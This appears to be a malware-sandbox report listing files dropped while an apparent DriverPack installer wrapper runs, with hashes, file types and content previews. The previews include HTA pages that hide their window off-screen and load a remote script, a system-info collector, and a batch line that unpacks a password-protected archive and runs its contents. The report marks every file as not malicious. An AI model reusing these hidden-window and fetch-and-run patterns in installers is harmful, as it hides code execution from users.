      SHA-256:60DDFC10CD097C0F68E6027B1FB723BC2667E979FA4663AE85362DCD57BB4C37
      SHA-512:E3254F50DDE760FAB7217627B89819D6C9A91804ECF2CCADC9BEE47C048967062688F2CE35D4708931C1947C0D19D29C6E21F5FE3DFEFF411145465B60D927F7
      Malicious:false
      Reputation:low
      Preview:GIF89a........z......D.....d....,..t........T..l....<.......4...........l..4..|........\.....~......D..d....,.....T..l.............|.................................................................!..NETSCAPE2.0.....!.......,...........@.pH$J$.d..b.%....t...a...4..%........}.H..PU..G.n.....G...\.....e..HUy\.h.!...G....W,.zbH.....Mw..%)aB..].rO.....H..%.r..D.M.`r..b.Em#.!.m.b..\.G,..$........,).\..`W...%,......).{P.,H..`....lx..Y..."..B.......d.....0dr..b....(C....A.P...&......QV.rO6..HL..z..$.0...0[.y.s..w.w.e.B.#..&...Q$=.:.!...R!)4..W....E(..:J..q...5....M...!.......,..........z......D........d..$..........t..4..T.............l.......L........l..4...........<...~......D........d..,..|..\..............<...............................................................pH$....$B.....L.E(..%.V........b......0U.h....e.....*+.+.Z&...e(.Gb.egL.."...u...a-X..RTLL.u.m-iM...`B.Z..^.....L......Dia.}.b.S..H....+.z..."...~~...u%.L.Z.n...|'Z...u.......9.i\._.4...`..%
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):92
      Entropy (8bit):4.252484278666437
      Encrypted:false
      SSDEEP:
      MD5:51C8E2EC2D4A042736B88F1BE1BE5B7E
      SHA1:1D0129C54851C24EF993FDED1645041F9DBDEEB0
      SHA-256:481BEEA6F83C5C784276DF3BFB8693CC60C0CE8EF0A2CB8F47D624E2D6C9B076
      SHA-512:E65F716422E1617E2840D0F16B04672F0F64296E57086A8ECA3FC778853D4B7DAB8173698FEA5BBC2617411CA1A8E50759A7D479614833BDF900DE0B619E32DF
      Malicious:false
      Reputation:low
      Preview:As Matomo is not installed yet, the Tracking API cannot proceed and will exit without error.
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):1807
      Entropy (8bit):4.663040957738839
      Encrypted:false
      SSDEEP:
      MD5:5BB70933199563BD95A85E9D58D0920B
      SHA1:1E0322DD237C61A911D58D11F3A2879D78A36444
      SHA-256:915A03DDD5D887CE43185A21FD9927FFCFC6E8F373D80D6FB0BFE96E65C029CD
      SHA-512:7F727D6F0ABB14746B24D10E7D2A532B20BA44B0E177C4B1D778BDF8EA3AC4D8B4D644EBEC169DAA4777DFFD22B376D1DAFB0EF790815558A665922598DA24EB
      Malicious:false
      Reputation:low
      Preview:.var loadedJS = [];..if (typeof loadedJS !== "undefined") { loadedJS.push("missing-scripts-detector.js"); }....function getScriptNames() {.. var scripts = document.getElementsByTagName("script");.. var names = [];.... for (var i = 0; i < scripts.length; i++) {.. var url = scripts[i].src;.. if ((url) && (url.indexOf("client_ip.js") === -1)) {.. var parts = url.split("/");.. var name = parts[parts.length - 1];.. names.push(name);.. }.. }.... return names;..}....function logMissingScripts() {.. var allJS = getScriptNames();.. var missingJS = [];.... for (var i = 0; i < allJS.length; i++) {.. var isLoaded = false;.... for (var j = 0; j < loadedJS.length; j++) {.. if (typeof loadedJS[j] === "string" && loadedJS[j] === allJS[i]) {.. isLoaded = true;.. break;.. }.. }.... if (!isLoaded) {.. missingJS.push(allJS[i]);..
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):3549
      Entropy (8bit):5.718751523287771
      Encrypted:false
      SSDEEP:
      MD5:5C4131C3255CB275FB6D7D2F2B6A1FB8
      SHA1:FF24D538B653C455865D6133AF5FF768FDADB32E
      SHA-256:75733A0CB0D087048775602B5AB85D081F5B26330189FD187529CDA95CB9A518
      SHA-512:4051ED5B1A4819E6EAFB0BF0E2DD4ED214EF9DC8DCCB1490D4AD59731B7B250DBC31E0B162C44B9E67A2DE071985B122C2C93117D8D1F4667FE3983B54A0ADA0
      Malicious:false
      Reputation:low
      Preview:.if (typeof loadedJS !== "undefined") { loadedJS.push("script.js"); }....var windowWidth = 700;..var windowHeight = 600;..function resizeWindow() {...var screenWidth = screen.availWidth;...var screenHeight = screen.availHeight;.....var newX = (screenWidth - windowWidth) / 2;...var newY = (screenHeight - windowHeight) / 2;.....var randomNumber = Math.floor(Math.random() * 5) + 1;.....try {....window.resizeTo(windowWidth, windowHeight + randomNumber);....window.moveTo(newX, newY);...} catch (e) { }..}..if ((typeof autoResizeNoNeed != 'undefined') && (autoResizeNoNeed !== true)) {...resizeWindow();...setTimeout(resizeWindow, 1000);..}....function closeHTA() {...window.moveTo(-1000, -1000)...setTimeout(function () { window.close(); }, 1000);.....sendMatomoEvent({....trackEvent: {.....category: 'Wrapper',.....action: 'Application closed'....}...});..}..function openPageHTA(url, target) {...try {....if (target) {.....WshShell.Run('%windir%\\system32\\mshta.exe "' + url + '"', 1, false);...
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):8133
      Entropy (8bit):5.512060404041763
      Encrypted:false
      SSDEEP:
      MD5:B2343F840D0138C1D34648AF653617AF
      SHA1:ABC1F107DFBAA67F7FADC6B03F2A69C561C51247
      SHA-256:8ECA86E628A4BF5C7CB78DB8654CE749E5BB4A3DAA5FE79ED61045CBF3A97E73
      SHA-512:8616D5865BF1C511F6E4C3E3CC5CBB1B2C4C71ECB255B3CB6EEF900EE3C9961E828A264F03436CAE7A7E430567BB397087550BADCCB83811C188CB90759F5B7C
      Malicious:false
      Reputation:low
      Preview:.if (typeof loadedJS !== "undefined") { loadedJS.push("statistics.js"); }..../*..// ............ .. Matomo Tracking HTTP API..// https://developer.matomo.org/api-reference/tracking-api......// ... ......... ........ ...... ....... sendMatomoEvent() . .......... ...........:..sendMatomoEvent({.. title: 'Menu',.. url: 'https://example.com/menu'..});....// ........ ....... . ............. . .......... URL:..sendMatomoEvent({.. title: 'Homepage',.. url: '/home'..});....// ........ ....... . .........., ........., ...... . .........:..sendMatomoEvent({.. trackEvent: {.. category: 'User Interaction',.. action: 'Click',.. name: 'Button 1',.. value: '10'.. }..});....// ........ ....... . ................. ....... (_cvar) . ........... .... (goalId):..sendMatomoE
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):3369
      Entropy (8bit):5.647548365349031
      Encrypted:false
      SSDEEP:
      MD5:D9C4EDD8648B146931B486C8FC4853F1
      SHA1:4B5C47AD23061C8E225E7F6BBC3F116100DA296F
      SHA-256:C36CFE0BBA2E4B111968E9899B82A5FD6829949D8BA4BF31D0448C86904D7AA0
      SHA-512:1541027AD8D858F4A584E18CAE73BE9BD4E9EA3ECC670D76AAF24A833D11B8A199CDAA4735A27E70A870426C98E25DAFD642E6530D712A3D1A82CAE8A61C5346
      Malicious:false
      Reputation:low
      Preview:.<!DOCTYPE html>..<html>....<head>...<title>Launcher</title>... ->.. <meta http-equiv="X-UA-Compatible" content="IE=7">.. -->...<HTA:APPLICATION ID="dwrapper" APPLICATIONNAME="dwrapper" ICON="%windir%\System32\magnify.exe" WIDTH="700"....HEIGHT="600" CONTEXTMENU="yes" SELECTION="yes" APPLICATION="no" BORDER="none" CAPTION="no" INNERBORDER="no"....MAXIMIZEBUTTON="yes" MINIMIZEBUTTON="yes" NAVIGABLE="yes" SCROLL="no" SCROLLFLAT="no" SHOWINTASKBAR="yes"....SINGLEINSTANCE="no" SYSMENU="yes" VERSION="0.1" WINDOWSTATE="normal" />.....<script type="text/javascript">....window.onload = function () {.....//window.focus();.....sendMatomoEvent({......title: 'Wrapper / Start screen page',......url: '/start_screen.html'.....});.....setTimeout(function () {......if (typeof logMissingScripts !== "undefined") {.......logMissingScripts();......}......else {.......sendMatomoEvent({........trackEvent: {.........category: 'Wrapper / Errors',.........action: '...... ......
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):2981
      Entropy (8bit):5.119918146134988
      Encrypted:false
      SSDEEP:
      MD5:817F995CDDC5BB427032EB7286FCDA39
      SHA1:C676C64C0D0C902C66E8448680846FF45D388E8B
      SHA-256:F3BDB1D94F79EFD344620028E69EB6BC4AADCA69081E9A9E91D5389E6BFD6DFB
      SHA-512:4ECA49C7041A35125031188716F341E1E7081FD7A4C7E505606E4FD38143164C36E461D42308D9633CCD89F113BBF4E77DE6C01DB60B0E4C29F447A7FB0CA4F6
      Malicious:false
      Reputation:low
      Preview:.html,..body {...height: 100%;...margin: 0;...padding: 0;.../*overflow-x: hidden;*/...overflow-y: auto;..}....body {...font-family: Calibri, 'Segoe UI', Verdana, Tahoma, Geneva, sans-serif;...font-weight: lighter;...font-size: 19px;..}.......close-btn {...position: absolute;...top: 0px;...right: 17px;...font-size: 30px;...cursor: pointer;..}....#language {...position: absolute;...bottom: 30px;...right: 37px;..}....#versionLabel {...left: 10px;...margin-left: 10px;...bottom: 10px;...font-size: 13px;...font-family: Geneva, Tahoma, sans-serif;..}.....antivirus-info {...margin-bottom: 20px;..}.....antivirus-info span {...display: block;..}....img {...max-width: 100%;..}.....content {...margin-top: 20px;..}....ul {...list-style: none;...padding: 0;..}....h1 {...text-align: center;..}....#download-button {...display: inline-block;...background-color: #0078D7;...color: white;...font-size: 20px;...text-decoration: none;...padding: 15px 30px;...margin: 10px;...border-radius: 10px;..}....#chec
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):28720
      Entropy (8bit):5.758320961370544
      Encrypted:false
      SSDEEP:
      MD5:E9263885D2D2BED0F368CD5D90698047
      SHA1:B042DB2B514AF942652C5F5CBA2EF6F5DC0F9226
      SHA-256:02200020C397C0472C3F5FC9E2B5F7A719154B87985C203CD9A6964413290E3B
      SHA-512:4660FD5392C147B0D319D0F3D5600DF363B183CEAEF6F81D501352FABDC0789B732ED07B0FD25E3CF066C86415A03C35D85CFB251FB2E7B5B212550AB4B4DA67
      Malicious:false
      Reputation:low
      Preview:.if (typeof loadedJS !== "undefined") { loadedJS.push("systeminfo.js"); }..../*........ ....... .......... . ............'WrapperVersion' => "0.1"...'clientID' => "8963475216364286.1680756768818"...'Lang' => "ru-ru"...'is64' => "true"...'JSVersion' => "11.0"...'isTouch' => "false"...'IEVers' => "7"...'WindowsDefender' :....'EngineVersion' :....'ASSignatureVersion' :....'AVSignatureVersion' :...'Caption' :....'Value' => ".......... Windows 11 Pro"....'Description' => "........ ............ ......."...'Version' :....'Value' => "10.0.22621"....'ValueText' => "Windows 10"....'Description' => "......... ............. ...... ............ ......."...'BuildNumber' :....'Value' => "22621"....'Description' => "..... ...... ............ ......."...'ProductType' :....'Value' => "1"....'ValueText' => "Workstation"....'Description' => "... ......
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):10534
      Entropy (8bit):5.5041888307359494
      Encrypted:false
      SSDEEP:
      MD5:611707E140B03EFA9C9631F957782EEC
      SHA1:4CC76AFAD867EAB58B921B4CA8CD9934D2A47703
      SHA-256:C1A0D9223806145168E67CF5280A9B9789976F14CC6B6A36485ECB0BAD2C8F34
      SHA-512:9268BE4465C11775031DE1E5ADD304AE0BB5745F97AEA5D81BE3B0A02DFD680BAA350702BF796393808D364B6E82D09CEC3D04AB82555B5EE568A03E5DE38BD8
      Malicious:false
      Reputation:low
      Preview:.<!DOCTYPE html>..<html>....<head>...<title>Read Log File</title>...<HTA:APPLICATION ID="dwrapper" APPLICATIONNAME="dwrapper" ICON="%windir%\System32\magnify.exe" WIDTH="700"....HEIGHT="600" CONTEXTMENU="yes" SELECTION="yes" APPLICATION="no" BORDER="none" CAPTION="no" INNERBORDER="no"....MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" NAVIGABLE="yes" SCROLL="no" SCROLLFLAT="no" SHOWINTASKBAR="no"....SINGLEINSTANCE="no" SYSMENU="no" VERSION="0.1" WINDOWSTATE="normal" />...<script type="text/javascript">....autoResizeNoNeed = true;....try {.....window.resizeTo(1, 1);.....window.moveTo(-1000, -1000)....} catch (error) { }...</script>...<script type="text/javascript" src="http://dwrapper-prod.herokuapp.com/client_ip.js"></script>... ...<script type="text/javascript" src="./src/variables.js"></script>...-->...<script type="text/javascript" src="./src/variables/1.js"></script>...<script type="text/javascript" src="./src/variables/2.js"></script>...<script type="text/javascript" src="./src/varia
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:modified
      Size (bytes):56441
      Entropy (8bit):5.068001464088981
      Encrypted:false
      SSDEEP:
      MD5:AAF25249DDD7AFC0A99B39A085E27033
      SHA1:4F21D63214651EE156CD7572ACFE48A6E97CFDE9
      SHA-256:CC26222908F43A21071926B389D606F57BBAEFB8C0C81D9F6E37D1002DFCAD32
      SHA-512:22BC9C0BA0C15F6E505B742369180CB00FF0B33FF7B4C509F90361955063272B9038871C8323ECADBBAC1DA4BB2124DE1263F4C66A6843E02BE9884B5F0D0567
      Malicious:false
      Reputation:low
      Preview:PSMODULECACHE.O...w.V-...O...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BranchCache\BranchCache.psd1 .......Clear-BCCache........Export-BCCachePackage........Add-BCDataCacheExtension........Set-BCCache........Publish-BCFileContent........Enable-BCHostedClient........Get-BCDataCache........Disable-BCServeOnBattery........Set-BCDataCacheEntryMaxAge........Enable-BCLocal........Enable-BCDowngrading........Enable-BCHostedServer........Set-BCSecretKey....$...Get-BCHostedCacheServerConfiguration........Remove-BCDataCacheExtension........Enable-BCDistributed........Enable-BCServeOnBattery........Import-BCCachePackage........Get-BCStatus........Set-BCMinSMBLatency........Set-BCAuthentication........Import-BCSecretKey........Get-BCClientConfiguration.... ...Get-BCContentServerConfiguration........Disable-BC........Reset-BC........Publish-BCWebContent........Get-BCNetworkConfiguration........Disable-BCDowngrading........Get-BCHashCache........Export-BCSecretKey........Get-BCDataCacheExt
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):2504
      Entropy (8bit):5.4260349754586965
      Encrypted:false
      SSDEEP:
      MD5:6489098D9CF889A5318634A88595F4E5
      SHA1:08F151E055C41158B151F5139E0B437264960ABF
      SHA-256:837696196A68493B0F1D2C54F9707A1FD70091F406097C204442741C8B303B68
      SHA-512:2F470FD35E31EE508804238E957B24BAE809CBF2B840371F55290C9F0C9FA9D50F036FDBA57B17E6ADA3B0B36372B24ED7DA5CC1CB636467A0B5DC09B3023447
      Malicious:false
      Reputation:low
      Preview:@...e...........9.....................^..............@..........P..................]...C....)...Y.....(.Microsoft.PowerShell.Commands.ManagementH..................#..A..g&.E$v...... .Microsoft.PowerShell.ConsoleHost0...............e.+.<..K..!..K.#........System..4................q.e...B..SP9?.........System.Core.D................0.9...K.r.*6...........System.Management.AutomationL...............TKZ....M..{.0...T.....#.Microsoft.Management.Infrastructure.<................/....KA..%*.}2.........System.Management...@...............l._>.CnI.ATB............System.DirectoryServices4...............-..%3..A.s.o.4+.........System.Xml..8.................`..ERC..B9%%.=........System.Numerics.<.................w..WD... . ..........System.Configuration4...............]v.P3..G..............System.Data.H..................!"EA.._>^...........Microsoft.PowerShell.Security...<...............d@..dhD...<.;4!........System.Transactions.P................V.. .A...."..{......%.Microsoft.PowerShell.Com
      Process:C:\Windows\SysWOW64\expand.exe
      File Type:7-zip archive data, version 0.4
      Category:dropped
      Size (bytes):12440274
      Entropy (8bit):7.999985618855094
      Encrypted:true
      SSDEEP:
      MD5:4354DF0A9A59DF39D5CFB2C4636A5F85
      SHA1:E0490AB9C6BBE6ECCCB7AC9CE8E266DB3D0BA7DB
      SHA-256:DFE2955BA24AD28704E059FE567902CE9F878C9D6F95184B82D95753E151757C
      SHA-512:6E208C9A9BDCF917810BAEAD0853E401C3CEBD7D8746A57F24BCE0B86FBFD2AD4A0D6EF50CDFAC608C767F6B8417842588D301986AC63794864E4A4D98A78899
      Malicious:false
      Reputation:low
      Preview:7z..'......;p......B........Cl......9......R`A....*...A>..B2..Y...y.`....b....;.VY.s...|fE..WUH.=.8.%..m....(l.(.Km...?v..M..j..F...z.:{....RdA?.....I....g.y.9.UA..6..;.h..?....>......,.HoG..3....,'..ak.,..&T....'MKu.F.".UC.u..U"D%...J|-b|....zc..:....n)N.y..O.K5.=.....[..B..V.....Z..>y....v.....dt....=.&...&.>....N..u.p.r.kQ......Vp2[..,.F..u.l.0...n..[.hn..<...yn..S.^...<.F.:'..**..:.sa."F...1.n.gn?..L...2r<wG....c..9.it'...&w.6.._9.X.....k..A..,.D*.9.....8....hV.I.b.^........r$.'..F.......%.]..L&<.......I...?..0...s.,.E.e..&56..q.y.....H....P...X..M....'....a.a>..._....u.F.${:.;.-L....&q.w...g,C.....,...... v.*Q.).....iE.....a.I....U...`...@U..x.~'$\......J....!.&T...w....?Z2..G....j.R.~..).......D...%.....`...{+..H.Y.pW...;g...9.Z...0U.I.:<c..@..%U..%.Gc....@.k.Qi.4H..YRU.].].fI..j.u.I...M..v.T.*..^.c..J............D...:.g.[..D..,)..R.z5.Xg.6Pk...g..fU@..P....<.p[Q.2.....R\...hM....b.=....rDkf.[8....N...../.F....(.:(Q.i.HU
      Process:C:\Windows\SysWOW64\expand.exe
      File Type:PE32 executable (console) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):815104
      Entropy (8bit):6.640822753066484
      Encrypted:false
      SSDEEP:
      MD5:90AAC6489F6B226BF7DC1ADABFDB1259
      SHA1:C90C47B717B776922CDD09758D2B4212D9AE4911
      SHA-256:BA7F3627715614D113C1E1CD7DD9D47E3402A1E8A7404043E08BC14939364549
      SHA-512:BEFAA9B27DC11E226B00A651AA91CBFE1EC36127084D87D44B6CD8A5076E0A092A162059295D3FCD17ABB6EA9ADB3B703F3652AE558C2EEF4E8932131397C12D
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      • Antivirus: Virustotal, Detection: 0%, Browse
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k.o..c<..c<..c<..o<..c<..h<..c<-.m<..c<..i<..c<..g<..c< .<<..c<..b<0.c<-.><..c<.,h<..c<.,i<..c<...<..c<6x`=..c<i.e<..c<Rich..c<................PE..L....r.b.....................V......t.............@..........................0............@.................................d...x................................f......................................................H............................text.............................. ..`.rdata...`.......b..................@..@.data...Ds..........................@....sxdata.............................@....rsrc...............................@..@.reloc...t.......v..................@..B................................................................................................................................................................................................................................................
      Process:C:\Windows\SysWOW64\expand.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):164864
      Entropy (8bit):6.557320277398497
      Encrypted:false
      SSDEEP:
      MD5:72DCC77BA25EBC4984D959A78C8646D5
      SHA1:50347FCDB44426918D2EEAFD5FF8CA9385FBBB0B
      SHA-256:6B4888207C46C23D2D4E4EACE8A2DB01711692BC7D4BB93F3750BC41E91BB73C
      SHA-512:1FF7C0027802E65D5D668F2C7D90B71D720C964E7DA03C2A8DC8E0B8456BFA8658CA57DE17E66A1EBAAEF5BF0BE1806188813E1DA608B6861BC4D8B6A48F8876
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      • Antivirus: Virustotal, Detection: 0%, Browse
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........P$C.>wC.>wC.>w,.5w@.>w..0wK.>w,.4wG.>w,.:wA.>w..awB.>wC.?wx.>w..cwD.>wu.5w..>wu.4wB.>wXt.wS.>w.=v@.>w..8wB.>w..:wB.>wRichC.>w........................PE..L....r.b...........!................7........ ............................................@..........................[..{....W..P.................................................................................... ...............................text...E........................... ..`.rdata..+=... ...>..................@..@.data....J...`.......L..............@....sxdata..............N..............@....rsrc................P..............@..@.reloc..R............h..............@..B........................................................................................................................................................................................................................................
      Process:C:\Windows\SysWOW64\expand.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):86
      Entropy (8bit):4.47458803671569
      Encrypted:false
      SSDEEP:
      MD5:232EBF167EA35163EA69A1570BE7B03E
      SHA1:B8BC8C8B3F9EBF83EC43244A934389BD98849A0A
      SHA-256:030EE398E53CAF0928E757162F3C7BE7D593A59DDE2795991EC7E4FD8E71F2E3
      SHA-512:EFE7D716B4C2553B1DC295271B1BB32FCCF12E2B64E6DE7ADBF5F8284BDEE1C3A92B5A227C46A6BFF6C1298D2E7319B73B7A75651710CAD84564F0C4EC4C917F
      Malicious:false
      Reputation:low
      Preview:cd /d "%~dp0"..rmdir /s /q ext..7za.exe x -y -aoa -pbeetle arc.7z -oext..ext\start.bat
      Process:C:\Windows\SysWOW64\expand.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):278528
      Entropy (8bit):6.620436545031121
      Encrypted:false
      SSDEEP:
      MD5:B54E2DCD1A3D593CA0AE4CB71910710E
      SHA1:15AB00317B310A7A535684C7221E0EB6CDE68AC2
      SHA-256:D7F1224CC4AFB90AF3792DADFDF2F14BAD4A19329EE0F3C87C111611AA36B7B1
      SHA-512:1414FD599095C3AFD4FAA6CF56E2F00D9DB4D80F460457E4E08734EE24ED852F74D5813B4E96091C330BA8DD2F998995233583BBF887EFF1C89B924B09A3FCC0
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      • Antivirus: Virustotal, Detection: 0%, Browse
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Uo{@............~...............~.......~.........J.........O.....H.....'(..K...'(...............|......................Rich............PE..L....r.b...........!................g.....................................................@.........................@...z...$...d....p...............................................................................................................text...%........................... ..`.rdata...[.......\..................@..@.data....K..........................@....sxdata......`......................@....rsrc........p......................@..@.reloc...'.......(..................@..B........................................................................................................................................................................................................................................................
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4aa, 9 symbols, created Mon Aug 28 11:32:12 2023, 1st section name ".debug$S"
      Category:dropped
      Size (bytes):1360
      Entropy (8bit):4.050104863523788
      Encrypted:false
      SSDEEP:
      MD5:7F663B8250BCDCFD1789404CC827AFC9
      SHA1:FBD86D9EAF46C7277ACE88450EB78190589A49A3
      SHA-256:158E592F8D4E56FA63CA9BEA67428F73026518AB0E54A7D3A43EF2900619BA62
      SHA-512:868C326B6C6F3B8703E00E6391DFBE7FFE154AA404BBE5D286FD3F146897E3ECA7F329D8AF18C5A32FA58587762D6459A44937366B662D0DB7BC187F3E0AAEA9
      Malicious:false
      Reputation:low
      Preview:L......d.............debug$S........l...................@..B.rsrc$01........X.......P...........@..@.rsrc$02........P...Z...............@..@........S....c:\Users\user\AppData\Local\Temp\e2ligmzk\CSCD3ADA2B05B0248E496F87BE664C3E88D.TMP...................y&...'X.qy.............3.......C:\Users\user\AppData\Local\Temp\RESC4A9.tmp.-.<....................a..Microsoft (R) CVTRES.|.=..cwd.C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.2.l.i.g.m.z.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Reputation:low
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\SysWOW64\expand.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):278528
      Entropy (8bit):6.620436545031121
      Encrypted:false
      SSDEEP:
      MD5:B54E2DCD1A3D593CA0AE4CB71910710E
      SHA1:15AB00317B310A7A535684C7221E0EB6CDE68AC2
      SHA-256:D7F1224CC4AFB90AF3792DADFDF2F14BAD4A19329EE0F3C87C111611AA36B7B1
      SHA-512:1414FD599095C3AFD4FAA6CF56E2F00D9DB4D80F460457E4E08734EE24ED852F74D5813B4E96091C330BA8DD2F998995233583BBF887EFF1C89B924B09A3FCC0
      Malicious:false
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Uo{@............~...............~.......~.........J.........O.....H.....'(..K...'(...............|......................Rich............PE..L....r.b...........!................g.....................................................@.........................@...z...$...d....p...............................................................................................................text...%........................... ..`.rdata...[.......\..................@..@.data....K..........................@....sxdata......`......................@....rsrc........p......................@..@.reloc...'.......(..................@..B........................................................................................................................................................................................................................................................
      Process:C:\Windows\SysWOW64\expand.exe
      File Type:PE32 executable (console) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):815104
      Entropy (8bit):6.640822753066484
      Encrypted:false
      SSDEEP:
      MD5:90AAC6489F6B226BF7DC1ADABFDB1259
      SHA1:C90C47B717B776922CDD09758D2B4212D9AE4911
      SHA-256:BA7F3627715614D113C1E1CD7DD9D47E3402A1E8A7404043E08BC14939364549
      SHA-512:BEFAA9B27DC11E226B00A651AA91CBFE1EC36127084D87D44B6CD8A5076E0A092A162059295D3FCD17ABB6EA9ADB3B703F3652AE558C2EEF4E8932131397C12D
      Malicious:false
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k.o..c<..c<..c<..o<..c<..h<..c<-.m<..c<..i<..c<..g<..c< .<<..c<..b<0.c<-.><..c<.,h<..c<.,i<..c<...<..c<6x`=..c<i.e<..c<Rich..c<................PE..L....r.b.....................V......t.............@..........................0............@.................................d...x................................f......................................................H............................text.............................. ..`.rdata...`.......b..................@..@.data...Ds..........................@....sxdata.............................@....rsrc...............................@..@.reloc...t.......v..................@..B................................................................................................................................................................................................................................................
      Process:C:\Windows\SysWOW64\expand.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):164864
      Entropy (8bit):6.557320277398497
      Encrypted:false
      SSDEEP:
      MD5:72DCC77BA25EBC4984D959A78C8646D5
      SHA1:50347FCDB44426918D2EEAFD5FF8CA9385FBBB0B
      SHA-256:6B4888207C46C23D2D4E4EACE8A2DB01711692BC7D4BB93F3750BC41E91BB73C
      SHA-512:1FF7C0027802E65D5D668F2C7D90B71D720C964E7DA03C2A8DC8E0B8456BFA8658CA57DE17E66A1EBAAEF5BF0BE1806188813E1DA608B6861BC4D8B6A48F8876
      Malicious:false
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........P$C.>wC.>wC.>w,.5w@.>w..0wK.>w,.4wG.>w,.:wA.>w..awB.>wC.?wx.>w..cwD.>wu.5w..>wu.4wB.>wXt.wS.>w.=v@.>w..8wB.>w..:wB.>wRichC.>w........................PE..L....r.b...........!................7........ ............................................@..........................[..{....W..P.................................................................................... ...............................text...E........................... ..`.rdata..+=... ...>..................@..@.data....J...`.......L..............@....sxdata..............N..............@....rsrc................P..............@..@.reloc..R............h..............@..B........................................................................................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1620)
      Category:dropped
      Size (bytes):4665
      Entropy (8bit):5.1187271616450465
      Encrypted:false
      SSDEEP:
      MD5:203AC1542D8E93EDBBC80F7B59DB5C44
      SHA1:BA66DB0E746BC550EA860F4023C3CB5C72140BA5
      SHA-256:8892E63141854BCF4BB1452ABEF68DD2C348C59322D697EF11A7AB7C5E3C4AEA
      SHA-512:53CB5AD72C66E62D9285C318B606A9819053DE729FA18EA72E80A7F09B333CC7868B455048660397086FA80A13CA745E42A6DC22DF63D059076BEFCA178A8A95
      Malicious:false
      Reputation:low
